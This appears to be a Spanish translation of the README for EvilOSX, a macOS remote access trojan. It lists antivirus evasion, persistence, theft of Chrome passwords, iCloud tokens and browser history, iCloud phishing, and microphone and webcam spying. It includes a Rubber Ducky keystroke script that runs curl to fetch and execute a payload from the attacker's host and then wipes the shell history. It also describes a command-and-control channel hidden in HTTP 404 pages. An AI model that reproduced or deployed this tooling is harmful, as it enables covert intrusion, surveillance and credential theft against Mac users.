Características

  • Emular una instancia de terminal
  • Sistema de módulo extensible simple
  • No hay dependencias bot (python puro)
  • No detectado por antivirus ( cargas encriptadas OpenSSL AES-256 cifradas)
  • Persistente
  • Soporte de GUI y CLI
  • Recuperar contraseñas de Chrome
  • Recuperar tokens y contactos de iCloud
  • Recuperar / monitorear el portapapeles
  • Recuperar el historial del navegador (Chrome y Safari)
  • Phish para contraseñas de iCloud a través de iTunes
  • Enumeración de copia de seguridad de iTunes (iOS)
  • Graba el micrófono
  • Toma una captura de pantalla o una imagen del escritorio con la cámara web.
  • Intente obtener root a través de la escalada de privilegios locales

Cómo utilizar

Advertencia: debido a que las cargas útiles se crean de forma exclusiva para el sistema de destino (automáticamente por el servidor), el servidor debe estar ejecutándose cuando cualquier bot se conecta por primera vez.

Usuarios avanzados

También hay un CLI para aquellos que quieren usar esto a través de SSH:

Capturas de pantalla

CLI
GUI

Motivación

Este proyecto fue creado para ser utilizado con mi super rubber ducky , aquí está el sencillo script:

1234567891011121314151617REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSXREM See also: https://ducktoolkit.com/vidpid/ DELAY 1000GUI SPACEDELAY 500STRING TerminaDELAY 1000ENTERDELAY 1500 REM Kill all terminals after x secondsSTRING screen -dm bash -c 'sleep 6; killall Terminal'ENTER STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clearENTER
  • Se tarda unos 10 segundos en hacer retroceder cualquier Mac desbloqueada, lo que es … bueno
  • Termina l se deletrea intencionadamente, en algunos sistemas, Spotlight no encontrará el terminal de otra manera.
  • Para omitir el asistente de configuración del teclado, asegúrese de cambiar el VID y PID que puede encontrar aquí . 
    El teclado de aluminio (ISO) es probablemente el que está buscando.

Versiones

EvilOSX se mantendrá en la medida de lo posible según las pautas de Versing semántico. 
Las versiones de servidor y bot se numerarán con el siguiente formato:

1<major>.<minor>.<patch>

Y construido con las siguientes pautas:

  • Romper la compatibilidad hacia atrás (con los bots más antiguos) golpea al mayor
  • Nuevas adiciones sin romper la compatibilidad hacia atrás golpea al menor
  • Corrección de errores y varios cambios golpean el parche

Para obtener más información sobre SemVer, visite https://semver.org/ .

Notas de Diseño

  • Infectar una máquina se divide en tres partes:
    • Un lanzador se ejecuta en la máquina de destino cuyo único objetivo es ejecutar el stager
    • El organizador solicita al servidor un cargador que maneje cómo se cargará una carga útil
    • El cargador recibe una carga útil encriptada de forma única y luego se envía de vuelta al servidor de etapas
  • El servidor oculta sus comunicaciones mediante el envío de mensajes ocultos en las páginas de error HTTP 404 (de “Hiding In Plain Sight” de BlackHat)
    • Las solicitudes de comando se recuperan del servidor a través de una solicitud GET
    • Las respuestas de comando se envían al servidor a través de una solicitud POST
  • Los módulos aprovechan la naturaleza dinámica de Python, simplemente se envían a través de la red comprimida con zlib , junto con las opciones de configuración.
  • Dado que el bot solo se comunica con el servidor y nunca al revés, el servidor no tiene forma de saber cuándo un bot se desconecta

G